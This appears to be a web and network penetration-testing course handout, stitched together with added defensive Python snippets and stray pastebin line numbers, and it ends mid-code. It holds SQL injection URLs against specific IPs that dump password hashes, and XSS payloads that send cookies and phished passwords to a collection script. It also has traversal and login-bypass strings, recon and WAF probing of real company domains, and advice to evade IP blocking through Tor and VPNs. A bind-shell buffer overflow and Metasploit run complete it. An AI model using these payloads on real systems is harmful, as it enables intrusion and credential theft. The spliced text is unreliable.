joemccray
Dahlgren Class
May 3rd, 2016
Secure Software Development
https://s3.amazonaws.com/StrategicSec-Files/SecureSoftwareDevelopment.zip


########################
# Down & Dirty App Sec #
########################

Download VMware Player if you are not currently running a version of VMware that is newer than VMware Workstation 11, VMware Fusion 7, or VMware Player 11. VMware Player is free and you can download it from here:
https://my.vmware.com/web/vmware/free#desktop_end_user_computing/vmware_workstation_player/12_0


Download the course virtual machines:
https://s3.amazonaws.com/StrategicSec-VMs/StrategicsecUbuntu14.zip
username: strategicsec
password: strategicsec


Start with simple Firefox add-ons:

- ShowIP https://addons.mozilla.org/en-US/firefox/addon/showip/
- Server Spy https://addons.mozilla.org/en-US/firefox/addon/server-spy/
- FoxyProxy https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/
- Tamper Data https://addons.mozilla.org/en-US/firefox/addon/tamper-data/
- Wappalyzer https://addons.mozilla.org/en-US/firefox/addon/wappalyzer/

A good list of web app testing add-ons for Firefox:
https://addons.mozilla.org/en-us/firefox/collections/adammuntner/webappsec/


##################################
# Basic: Web Application Testing #
##################################

Most people are going to tell you to reference the OWASP Testing Guide.
https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents

I'm not a fan of it for the purpose of actual testing. It's good for defining the scope of an assessment, and defining attacks, but not very good for actually attacking a website.


The key to doing a Web App Assessment is to ask yourself the 3 web questions on every page in the site.

1. Does the website talk to a DB?
- Look for parameter passing (ex: site.com/page.php?id=4)
- If yes - try SQL Injection

2. Can I or someone else see what I type?
- If yes - try XSS

3. Does the page reference a file?
- If yes - try LFI/RFI

Let's start with some manual testing against 54.149.82.150

Start here:
http://54.149.82.150/

There's no parameter passing on the home page, so the answer to question 1 is NO.
There is, however, a search box in the top right of the webpage, so the answer to question 2 is YES.

Try an XSS in the search box on the home page:
<script>alert(123);</script>

Doing this gives us the following in the address bar:
http://54.149.82.150/BasicSearch.aspx?Word=<script>alert(123);</script>

Ok, so we've verified that there is XSS in the search box.

Let's move on to the search box on the left of the page.

Let's give the newsletter signup box a shot.

Moving on to the login page.
http://54.149.82.150/login.aspx

I entered a single quote (') for both the user name and the password. I got the following error:

Let's try throwing a single quote (') in there:

http://54.149.82.150/bookdetail.aspx?id=2'

I get the following error:

Unclosed quotation mark after the character string ''.
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark after the character string ''.


#############################################################################
# SQL Injection #
# https://s3.amazonaws.com/StrategicSec-Files/1-Intro_To_SQL_Intection.pptx #
#############################################################################

- Another quick way to test for SQLi is to remove the parameter value


#############################
# Error-Based SQL Injection #
#############################
http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(0))--
http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(1))--
http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(2))--
http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(3))--
http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(4))--
http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(N))-- NOTE: "N" just means keep going until you run out of databases
http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85))--
http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'bookmaster')--
http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'sysdiagrams')--


#############################
# Union-Based SQL Injection #
#############################
http://54.149.82.150/bookdetail.aspx?id=2 order by 100--
http://54.149.82.150/bookdetail.aspx?id=2 order by 50--
http://54.149.82.150/bookdetail.aspx?id=2 order by 25--
http://54.149.82.150/bookdetail.aspx?id=2 order by 10--
http://54.149.82.150/bookdetail.aspx?id=2 order by 5--
http://54.149.82.150/bookdetail.aspx?id=2 order by 6--
http://54.149.82.150/bookdetail.aspx?id=2 order by 7--
http://54.149.82.150/bookdetail.aspx?id=2 order by 8--
http://54.149.82.150/bookdetail.aspx?id=2 order by 9--
http://54.149.82.150/bookdetail.aspx?id=2 union all select 1,2,3,4,5,6,7,8,9--

We are using a UNION SELECT statement because we are joining the developer's query with one of our own.
Reference:
http://www.techonthenet.com/sql/union.php
The SQL UNION operator is used to combine the result sets of 2 or more SELECT statements.
It removes duplicate rows between the various SELECT statements.

Each SELECT statement within the UNION must have the same number of fields in the result sets with similar data types.

http://54.149.82.150/bookdetail.aspx?id=-2 union all select 1,2,3,4,5,6,7,8,9--

Negating the parameter value (changing id=2 to id=-2) makes the developer's query return no rows, so the page displays our UNION row instead and shows which columns are echoed back.

http://54.149.82.150/bookdetail.aspx?id=-2 union all select 1,user,@@version,4,5,6,7,8,9--
http://54.149.82.150/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,7,8,9--
http://54.149.82.150/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,db_name(0),8,9--
http://54.149.82.150/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,master.sys.fn_varbintohexstr(password_hash),8,9 from master.sys.sql_logins--


- Another way is to see if you can get the backend to perform an arithmetic function
http://54.149.82.150/bookdetail.aspx?id=(2)
http://54.149.82.150/bookdetail.aspx?id=(4-2)
http://54.149.82.150/bookdetail.aspx?id=(4-1)


http://54.149.82.150/bookdetail.aspx?id=2 or 1=1--
http://54.149.82.150/bookdetail.aspx?id=2 or 1=2--
http://54.149.82.150/bookdetail.aspx?id=1*1
http://54.149.82.150/bookdetail.aspx?id=2 or 1 >-1#
http://54.149.82.150/bookdetail.aspx?id=2 or 1<99#
http://54.149.82.150/bookdetail.aspx?id=2 or 1<>1#
http://54.149.82.150/bookdetail.aspx?id=2 or 2 != 3--
http://54.149.82.150/bookdetail.aspx?id=2 &0#


###############################
# Blind SQL Injection Testing #
###############################
Time-Based BLIND SQL INJECTION - EXTRACT DATABASE USER

3 - Total Characters
http://54.149.82.150/bookdetail.aspx?id=2; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
http://54.149.82.150/bookdetail.aspx?id=2; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
http://54.149.82.150/bookdetail.aspx?id=2; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'-- (Ok, the username is 3 chars long - it waited 10 seconds)

Let's go for a quick check to see if it's DBO
http://54.149.82.150/bookdetail.aspx?id=2; IF ((USER)='dbo') WAITFOR DELAY '00:00:10'--

Yup, it waited 10 seconds so we know the username is 'dbo' - let's give you the syntax to verify it just for fun.

D - 1st Character
http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:10'--
http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--
http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--
http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'-- (Ok, the first letter is ASCII 100, which is the letter 'd' - it waited 10 seconds)

B - 2nd Character
http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good, it waited for 10 seconds
http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'-- Ok, good, it waited for 10 seconds

O - 3rd Character
http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good, it waited for 10 seconds
http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY '00:00:10'--
http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY '00:00:10'-- Ok, good, it waited for 10 seconds
http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'-- Ok, good, it waited for 10 seconds
http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'--
http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=110) WAITFOR DELAY '00:00:10'-- Ok, good, it waited for 10 seconds
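The probes in the error-based, UNION-based and blind sections above leave a recognisable trail in the web server's logs. As an added example (not part of the course material), here is a small Python detector run over constructed IIS W3C log lines: it flags those patterns, treats an HTTP 500 on a quoted or keyword-bearing parameter as the "Unclosed quotation mark" symptom, and uses the time-taken field to tell a WAITFOR probe that actually slept from one that did not. The log excerpt, IPs and URIs are constructed; the pattern list also covers the Oracle utl_inaddr technique used later in these notes.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C-style log excerpt (not real traffic). time-taken is in
# milliseconds; the queries mirror the probes shown in the sections above.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status time-taken
2016-05-03 10:00:01 10.0.0.5 GET /bookdetail.aspx id=2 200 31
2016-05-03 10:00:09 10.0.0.5 GET /bookdetail.aspx id=2' 500 15
2016-05-03 10:00:15 10.0.0.5 GET /bookdetail.aspx id=2+or+1+in+(SELECT+DB_NAME(0))-- 500 12
2016-05-03 10:00:30 10.0.0.5 GET /bookdetail.aspx id=-2+union+all+select+1,user,@@version,4,5,6,7,8,9-- 200 40
2016-05-03 10:01:02 10.0.0.5 GET /bookdetail.aspx id=2;+IF+(LEN(USER)=3)+WAITFOR+DELAY+'00:00:10'-- 200 10017
2016-05-03 10:01:20 10.0.0.5 GET /bookdetail.aspx id=2;+IF+(LEN(USER)=2)+WAITFOR+DELAY+'00:00:10'-- 200 22
2016-05-03 10:02:00 10.0.0.9 GET /BasicSearch.aspx Word=security 200 18
"""

# Each pattern is named after the technique it indicates. utl_inaddr is the
# Oracle error-based variant; the rest are the MSSQL probes from this page.
SQLI_PATTERNS = [
    ("union-based",  re.compile(r"\bunion\b.{0,20}\bselect\b", re.I)),
    ("column-count", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("error-based",  re.compile(r"\b(db_name|sysobjects|utl_inaddr)\b", re.I)),
    ("time-based",   re.compile(r"\bwaitfor\s+delay\b", re.I)),
    ("quote-probe",  re.compile(r"'\s*(or|and|--|$)", re.I)),
]

DELAY_THRESHOLD_MS = 9000   # a WAITFOR DELAY '00:00:10' that fired takes ~10 s


def parse_line(line):
    """Split one W3C log line into the fields the detector needs (None if malformed)."""
    parts = line.split()
    if len(parts) != 8:
        return None
    _date, _time, ip, _method, stem, query, status, taken = parts
    return {"ip": ip, "stem": stem, "query": unquote_plus(query),
            "status": int(status), "taken_ms": int(taken)}


def classify(entry):
    """Return the list of SQLi indicators present in one parsed request."""
    tags = [name for name, rx in SQLI_PATTERNS if rx.search(entry["query"])]
    # HTTP 500 on a request that carries a quote or an injection keyword is the
    # "Unclosed quotation mark" symptom: the parameter reached the SQL parser.
    if entry["status"] == 500 and (tags or "'" in entry["query"]):
        tags.append("db-error-500")
    # A time-based probe only tells the sender something when the server slept.
    if "time-based" in tags and entry["taken_ms"] >= DELAY_THRESHOLD_MS:
        tags.append("delay-observed")
    return tags


def scan(log_text):
    """Return (ip, uri-stem, decoded query, tags) for every flagged request."""
    findings = []
    for line in log_text.splitlines():
        if not line or line.startswith("#"):
            continue
        entry = parse_line(line)
        if entry is None:
            continue
        tags = classify(entry)
        if tags:
            findings.append((entry["ip"], entry["stem"], entry["query"], tags))
    return findings


def suspicious_ips(findings, threshold=3):
    """Sources with at least `threshold` flagged requests. The blind technique
    above needs many requests per character, so repetition is the signal."""
    counts = {}
    for ip, _stem, _query, _tags in findings:
        counts[ip] = counts.get(ip, 0) + 1
    return sorted(ip for ip, n in counts.items() if n >= threshold)


if __name__ == "__main__":
    for ip, stem, query, tags in scan(SAMPLE_LOG):
        print(f"{ip} {stem}?{query[:60]!r} -> {', '.join(tags)}")
    print("noisy sources:", suspicious_ips(scan(SAMPLE_LOG)))
```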
  222.  
  223.  
  224.  
  225.  
  226.  
  227.  
  228.  
  229.  
  230.  
  231.  
  232. ###################################################################
  233. # What is XSS #
  234. # https://s3.amazonaws.com/StrategicSec-Files/2-Intro_To_XSS.pptx #
  235. ###################################################################
  236.  
  237. OK - what is Cross Site Scripting (XSS)
  238.  
  239. 1. Use Firefox to browse to the following location:
  240.  
  241. http://54.172.112.249/xss_practice/
  242.  
  243. A really simple search page that is vulnerable should come up.
  244.  
  245.  
  246.  
  247.  
  248. 2. In the search box type:
  249.  
  250. <script>alert('So this is XSS')</script>
  251.  
  252.  
  253. This should pop-up an alert window with your message in it proving XSS is in fact possible.
  254. Ok, click OK and then click back and go back to http://54.172.112.249/xss_practice/
  255.  
  256.  
  257. 3. In the search box type:
  258.  
  259. <script>alert(document.cookie)</script>
  260.  
  261.  
  262. This should pop-up an alert window with your message in it proving XSS is in fact possible and your cookie can be accessed.
  263. Ok, click OK and then click back and go back to http://54.172.112.249/xss_practice/
  264.  
  265. 4. Now replace that alert script with:
  266.  
  267. <script>document.location="http://54.172.112.249/xss_practice/cookie_catcher.php?c="+document.cookie</script>
  268.  
  269.  
  270. This will actually pass your cookie to the cookie catcher that we have sitting on the webserver.
  271.  
  272.  
  273. 5. Now view the stolen cookie at:
  274. http://54.172.112.249/xss_practice/cookie_stealer_logs.html
  275.  
  276.  
  277. The cookie catcher writes to this file and all we have to do is make sure that it has permissions to be written to.
  278.  
  279.  
  280.  
  281.  
  282.  
  283.  
############################
# A Better Way To Demo XSS #
############################

Let's take this to the next level. We can modify this attack to include some username/password collection. Paste all of this into the search box.

Use Firefox to browse to the following location:

http://54.172.112.249/xss_practice/


Paste this in the search box
----------------------------

Option 1
--------

<script>
password=prompt('Your session is expired. Please enter your password to continue',' ');
document.write("<img src=\"http://54.172.112.249/xss_practice/passwordgrabber.php?password=" +password+"\">");
</script>

Now view the captured passwords at:
http://54.172.112.249/xss_practice/passwords.html


Option 2
--------
<script>
username=prompt('Please enter your username',' ');
password=prompt('Please enter your password',' ');
document.write("<img src=\"http://54.172.112.249/xss_practice/unpw_catcher.php?username="+username+"&password="+password+"\">");
</script>

Now view the captured usernames and passwords at:
http://54.172.112.249/xss_practice/username_password_logs.html


#########################################
# Let's kick it up a notch with ASP.NET #
# http://54.200.178.220/ #
#########################################

The trading Web App is on http://54.200.178.220/

Try the following in the search box:
<script>alert(123);</script>
' or 1=1
' and a=a
1=1
Joe'+OR+1=1;--

<script>alert(123);</script>

Open a new tab in Firefox and try this:
http://54.200.178.220/Searchresult.aspx?<script>alert(123);</script>=ScriptName


Try the contact us form.
Open a new tab in Firefox and try this:
http://54.200.178.220/OpenPage.aspx?filename=../../../../../../windows/win.ini
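The OpenPage.aspx request above works because the application joins whatever is in filename onto a directory and opens it. As an added example in Python (not the course's code and not the trading app's), here is the containment check a defender would want on that parameter: resolve the path, confirm it is still inside the pages directory, and only then allow an allow-listed extension. The base directory and file names are constructed, and the parameter is assumed to be already URL-decoded by the framework.

```python
import os

# Assumed layout: the static pages the viewer may serve live under this directory.
PAGES_DIR = "/srv/demo-pages"            # constructed for the example
ALLOWED_SUFFIXES = (".html", ".txt")


def resolve_page(base_dir, requested):
    """Map a user-supplied filename onto a path inside base_dir.

    Returns the absolute path to open, or None when the request escapes the
    directory or names a file type the page viewer should not serve.
    """
    base = os.path.realpath(base_dir)
    # The vulnerable app is ASP.NET on Windows, where '\' is also a separator;
    # normalise it so "..\..\windows\win.ini" is judged the same as "../..".
    name = requested.replace("\\", "/")
    # realpath collapses "..", "." and symlinks before the prefix comparison.
    candidate = os.path.realpath(os.path.join(base, name))
    # join() discards base when name is absolute, so commonpath catches that too.
    if os.path.commonpath([base, candidate]) != base:
        return None
    if not candidate.lower().endswith(ALLOWED_SUFFIXES):
        return None
    return candidate


def open_page(base_dir, requested):
    """The read the viewer performs; only reached after containment succeeds."""
    path = resolve_page(base_dir, requested)
    if path is None:
        raise PermissionError(f"refused: {requested!r}")
    with open(path, "rb") as fh:
        return fh.read()


if __name__ == "__main__":
    for name in ("about.html", "../../../../../../windows/win.ini",
                 "..\\..\\windows\\win.ini", "/etc/passwd", "about.aspx"):
        print(f"{name!r:45} -> {resolve_page(PAGES_DIR, name)}")
```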

Try this on the inquiry form:
Joe McCray
1234567890
joe@strategicsec.com') waitfor delay '00:00:10'--


Login Box:

' or 1=1 or ''='
anything (click login instead of pressing enter)


Tamper Data: (notice 2 session IDs)

AcmeTrading=a4b796687b846dd4a34931d708c62b49; SessionID is md5
IsAdmin=yes;
ASP.NET_SessionId=d10dlsvaq5uj1g550sotcg45


Profile - Detail (tamper data)
Disposition: form-data; name="ctl00$contentMiddle$HiddenField1"\r\n\r\njoe\r\n
joe|set
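Two of the cookies captured with Tamper Data above, the md5-looking session ID and IsAdmin=yes, are values the server trusts straight from the client, and the earlier XSS exercise shows document.cookie reading them. As an added example in Python (not the trading app's code), here is how a defender closes both: an unguessable session ID, any state that must travel in the cookie carried under an HMAC so an edited IsAdmin is rejected, and HttpOnly/Secure flags so page script cannot read the cookie. The key and cookie names are constructed.

```python
import base64
import hashlib
import hmac
import json
import secrets

# Constructed key for the example; a real app loads this from its secret store.
SERVER_KEY = b"demo-signing-key-not-for-production"


def new_session_id():
    """Opaque, unguessable session ID (contrast with an md5 of something predictable)."""
    return secrets.token_urlsafe(32)


def _mac(body):
    return hmac.new(SERVER_KEY, body.encode(), hashlib.sha256).hexdigest()


def sign_cookie(payload):
    """Serialise a dict as base64 and append an HMAC-SHA256 over it.

    Authorization state is best kept server-side keyed by the session ID; the
    signature is the minimum for anything that must ride in the cookie itself.
    """
    body = base64.urlsafe_b64encode(json.dumps(payload, sort_keys=True).encode()).decode()
    return f"{body}.{_mac(body)}"


def verify_cookie(value):
    """Return the payload only if the MAC matches; None for anything edited or malformed."""
    try:
        body, mac = value.rsplit(".", 1)
    except ValueError:
        return None
    if not hmac.compare_digest(mac, _mac(body)):
        return None
    try:
        return json.loads(base64.urlsafe_b64decode(body))
    except (ValueError, TypeError):
        return None


def set_cookie_header(name, value):
    """HttpOnly keeps document.cookie (and the cookie catcher above) from seeing it;
    Secure keeps it off plain HTTP; SameSite limits cross-site sends."""
    return f"Set-Cookie: {name}={value}; Path=/; Secure; HttpOnly; SameSite=Lax"


def simulate_client_edit(cookie, field, new_value):
    """What a Tamper Data style edit of the payload looks like: the body changes,
    the MAC does not, so verify_cookie() must reject the result."""
    body, mac = cookie.rsplit(".", 1)
    data = json.loads(base64.urlsafe_b64decode(body))
    data[field] = new_value
    edited = base64.urlsafe_b64encode(json.dumps(data, sort_keys=True).encode()).decode()
    return f"{edited}.{mac}"


if __name__ == "__main__":
    cookie = sign_cookie({"sid": new_session_id(), "user": "joe", "IsAdmin": "no"})
    print(set_cookie_header("AcmeTrading", cookie))
    print("valid  :", verify_cookie(cookie))
    print("edited :", verify_cookie(simulate_client_edit(cookie, "IsAdmin", "yes")))
```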


xss_upload.txt (Upload Bulk Order)
<script>alert(123);</script>


###############################
# How much fuzzing is enough? #
###############################
There really is no exact science for determining the correct amount of fuzzing per parameter to do before moving on to something else.

Here are the steps that I follow when I'm testing (my mental decision tree) to figure out how much fuzzing to do.

Step 1: Ask yourself the 3 questions per page of the site.

Step 2: If the answer is yes, then go down that particular attack path with a few fuzz strings (I usually do 10-20 fuzz strings per parameter).

Step 3: When you load your fuzz strings, use the following decision tree:

- Are the fuzz strings causing a default error message (example 404)?
- If this is the case then it is most likely NOT vulnerable

- Are the fuzz strings causing a WAF or LB custom error message?
- If this is the case then you need to find an encoding method to bypass

- Are the fuzz strings causing an error message that discloses the backend type?
- If yes, then identify the DB type and find the correct syntax to successfully exploit
- Some example strings that I use are:
'
"
() <----- Take the parameter value and put it in parentheses
(5-1) <----- See if you can perform an arithmetic function

- Are the fuzz strings rendering executable code?
- If yes, then report XSS/CSRF/Response Splitting/Request Smuggling/etc
- Some example strings that I use are:
<b>hello</b>
<u>hello</u>
<script>alert(123);</script>
<script>alert(xss);</script>
<script>alert('xss');</script>
<script>alert("xss");</script>


############################
# Trading Web App with WAF #
# http://54.213.131.105 #
############################

Try the following in the search box:
<script>alert(123);</script>
<script>alert(123);</script
<script>alert(123)
<script>alert
<script>
<script
<scrip
<scri
<scr
<sc
<s
<p
<
< s
Joe'+OR+1=1;--

Open a new tab in Firefox and try this:
http://54.213.131.105/Searchresult.aspx?%u003cscript>prompt(123)%u003c/script>=ScriptName

xss_upload.txt (Upload Bulk Order)
<script>alert(123);</script>

Login Box:

' or 1=1 or ''='
anything


Tamper Data: (notice 2 session IDs)

AcmeTrading=a4b796687b846dd4a34931d708c62b49; SessionID is md5
IsAdmin=yes;
ASP.NET_SessionId=d10dlsvaq5uj1g550sotcg45


Profile - Detail (tamper data)
Disposition: form-data; name="ctl00$contentMiddle$HiddenField1"\r\n\r\njoe\r\n
joe|set


###########################################################
# Attacking an Oracle/JSP based WebApp with SQL Injection #
###########################################################

http://54.69.156.253:8081/bookcompany/

user: a' OR 'a'='a
pass: a' OR 'a'='a


http://54.69.156.253:8081/bookcompany/author.jsp?id=111

[ Search by Username ] Joe' OR 'a'='a


http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1

http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1' OR '1'='1


http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1' or 1=utl_inaddr.get_host_address((select banner from v$version where rownum=1))--

Host is running:


http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1' or 1=utl_inaddr.get_host_address((SELECT user FROM dual))--

User is:


http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1' or 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name))--

Current database is:


###################################################
# Day 1: Identifying External Security Mechanisms #
###################################################

sudo /sbin/iptables -F
cd /home/strategicsec/toolz


###########################
# Target IP Determination #
###########################

perl blindcrawl.pl -d motorola.com

-- Take each IP address and look it up here:
http://www.networksolutions.com/whois/index.jsp

cd ~/toolz/fierce2
fierce -dns motorola.com
cd ..

Zone transfer fails on most domains, but here is an example of one that works:
dig axfr heartinternet.co.uk @ns.heartinternet.co.uk


cd ~/toolz/
./ipcrawl 148.87.1.1 148.87.1.254 (DNS forward lookup against an IP range)


sudo nmap -sL 148.87.1.0-255
sudo nmap -sL 148.87.1.0-255 | grep oracle

sudo nmap -p 443,444,8443,8080,8088 --script=ssl-cert --open 148.87.1.0-255
Reference: http://blog.depthsecurity.com/2012/01/obtaining-hostdomain-names-through-ssl.html


###########################
# Load Balancer Detection #
###########################

Here are some options to use for identifying load balancers:
- news.netcraft.com
- Firefox LiveHTTP Headers

Here are some command-line options to use for identifying load balancers:

dig google.com

cd ~/toolz
./lbd-0.1.sh google.com

halberd microsoft.com
halberd motorola.com
halberd oracle.com


##################################
# Intrusion Prevention Detection #
##################################

osstmm-afd -P HTTP -t www.strategicsec.com -v

cat /etc/xinetd.d/ssltest

cat /home/strategicsec/toolz/ssl_proxy.sh

service xinetd status

osstmm-afd -P HTTP -t 127.0.0.1 -p 8888 -v

****** If you are getting your IP blocked you can use a service like AceVPN to give you multiple IPs to launch your tests from. ******


######################################
# Web Application Firewall Detection #
######################################

cd ~/toolz/wafw00f
python wafw00f.py http://www.oracle.com
python wafw00f.py http://www.strategicsec.com

cd ~/toolz/
sudo nmap -p 80 --script http-waf-detect.nse oracle.com

sudo nmap -p 80 --script http-waf-detect.nse healthcare.gov


#######################################################
# Day 1: 3rd Party Scanning, and scanning via proxies #
#######################################################

http://www.shodanhq.com/

Create a FREE account and login

net:129.188.8.0/24


cd /home/strategicsec/toolz/
perl proxyfinder-0.3.pl multiproxy 3 proxies.txt <-- This takes a long time to run


sudo vi /etc/proxychains.conf <--- Make sure that the last line of the file is: socks4 127.0.0.1 9050


----------------------------------------------------------------------
vi ~/toolz/fix-proxychains-dns.sh

#!/bin/bash
# This script is called by proxychains to resolve DNS names
# DNS server used to resolve names
# Reference: http://carnal0wnage.attackresearch.com/2013/09/changing-proxychains-hardcoded-dns.html
DNS_SERVER=4.2.2.2

if [ $# = 0 ] ; then
    echo " usage:"
    echo " proxyresolv <hostname> "
    exit
fi

# Query over TCP so that the lookup itself is carried through the proxy chain,
# then print the address from the answer section.
export LD_PRELOAD=libproxychains.so.3
dig "$1" @$DNS_SERVER +tcp | awk '/A.+[0-9]+\.[0-9]+\.[0-9]/{print $5;}'
-----------------------------------------------------------------------


sudo ntpdate pool.ntp.org

tor-resolve strategicsec.com

proxychains nmap -sT -p80 204.244.123.113

proxychains nmap -sT -PN -n -sV -p 21,22,23,25,80,110,139,443,445,1433,1521,3306,3389,8080,10000 204.244.123.113


If you want to block Tor exit nodes you can get a list from here:
http://rules.emergingthreats.net/blockrules/emerging-tor-BLOCK.rules

You probably should also block things like:
http://rules.emergingthreats.net/blockrules/emerging-rbn-BLOCK.rules <----- Russian Business Network IPs
http://rules.emergingthreats.net/blockrules/emerging-botcc.rules <----- BotNet Command and Control Servers
http://rules.emergingthreats.net/blockrules/emerging-rbn-malvertisers-BLOCK.rules <----- Malware Advertisers

Here is where you can download the perl script to automatically update your firewall each day (create a cron job for it).
http://doc.emergingthreats.net/bin/view/Main/EmergingFirewallRules


######################
# Simple Exploit Dev #
######################

- Inside of your Windows 7 VM, download the following file to the Desktop:
https://s3.amazonaws.com/StrategicSec-Files/SimpleExploitLab.zip

- Extract this zip file to your Desktop

- Go to folder C:\Users\Workshop\Desktop\ExploitLab\2-VulnServer, and run vulnserv.exe

- Open a new command prompt and type:
nc localhost 9999

- In the new command prompt window where you ran nc type:
HELP

- Go to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts
- Right-click on 1-simplefuzzer.py and choose the option edit with notepad++

- Now double-click on 1-simplefuzzer.py
- You'll notice that vulnserv.exe crashes. Be sure to note what command and the number of As it crashed on.

- Restart vulnserv, and run 1-simplefuzzer.py again. Be sure to note what command and the number of As it crashed on.

- Now go to folder C:\Users\Workshop\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and attach to process vulnserv.exe

- Go back to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts and double-click on 1-simplefuzzer.py.

- Take note of the registers (EAX, ESP, EBP, EIP) that have been overwritten with As (41s).

- Now isolate the crash by restarting your debugger and running script 2-3000chars.py

- Calculate the distance to EIP by running script 3-3000chars.py
- This script sends 3000 nonrepeating chars to vulnserv.exe and populates EIP with the value: 396F4338

4-count-chars-to-EIP.py
- In the previous script we saw that EIP is overwritten with 396F4338, which read as little-endian bytes is 8 (38), C (43), o (6F), 9 (39)
- so we search for 8Co9 in the string of nonrepeating chars and count the distance to it

5-2006char-eip-check.py
- In this script we check that our calculation of the distance to EIP is correct by overwriting EIP with 42424242

6-jmp-esp.py
- In this script we overwrite EIP with the address of a JMP ESP (6250AF11) inside of essfunc.dll

7-first-exploit
- In this script we actually do the stack overflow and launch a bind shell on port 4444

8 - Take a look at the file vulnserv.rb and place it in your Ubuntu host via SCP, or copy it and paste the code into the host.


------------------------------

cd /home/strategicsec/toolz/metasploit/modules/exploits/windows/misc

vi vulnserv.rb


cd ~/toolz/metasploit

./msfconsole


use exploit/windows/misc/vulnserv
set PAYLOAD windows/meterpreter/bind_tcp
set RHOST 192.168.153.133
set RPORT 9999
exploit


###############################
# InfoSec Program Development #
###############################
Download this file for the program development walk-through:
https://s3.amazonaws.com/StrategicSec-Files/Build-InfoSec-Assessment-Capability.zip


############################
# Download the Analysis VM #
############################
https://s3.amazonaws.com/StrategicSec-VMs/StrategicsecUbuntu-v3.zip
user: malware
pass: malware

- Log in to your Ubuntu system with the username 'malware' and the password 'malware'.

- After logging in, please open a terminal window and type the following commands:

cd Desktop/

- This is actual malware (remember to run it in a VM). The password to extract it is 'infected':

wget https://s3.amazonaws.com/StrategicSec-Files/MalwareAnalysis/malware-password-is-infected.zip
wget https://s3.amazonaws.com/StrategicSec-Files/analyse_malware.py

unzip malware-password-is-infected.zip
infected

file malware.exe

mv malware.exe malware.pdf

file malware.pdf

mv malware.pdf malware.exe

hexdump -n 2 -C malware.exe

***What is '4d 5a' or 'MZ'?***
Reference:
http://www.garykessler.net/library/file_sigs.html

objdump -x malware.exe

strings malware.exe

strings --all malware.exe | head -n 6

strings malware.exe | grep -i dll

strings malware.exe | grep -i library

strings malware.exe | grep -i reg

strings malware.exe | grep -i hkey

strings malware.exe | grep -i hku

- We didn't see anything like HKLM, HKCU or other registry type stuff

strings malware.exe | grep -i irc

strings malware.exe | grep -i join

strings malware.exe | grep -i admin

strings malware.exe | grep -i list

- List of IRC commands: https://en.wikipedia.org/wiki/List_of_Internet_Relay_Chat_commands

sudo apt-get install -y python-pefile

vi analyse_malware.py

python analyse_malware.py malware.exe
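file, hexdump and pefile above all key off the same thing: the first bytes of the file, not its name. As an added example in Python (not analyse_malware.py and not the course's code), here is that logic written out: identify a file from its magic bytes, flag a name whose extension disagrees with its content (the malware.exe/malware.pdf rename above), and follow the DOS header's e_lfanew to the PE signature and section count the way pefile does. The PE sample is a minimal constructed header, not a real binary.

```python
import os
import struct

# Signatures taken from the file-signature table referenced above.
MAGIC = [
    (b"MZ", "pe"),
    (b"%PDF", "pdf"),
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "ole2"),    # legacy .doc/.xls, what oledump parses
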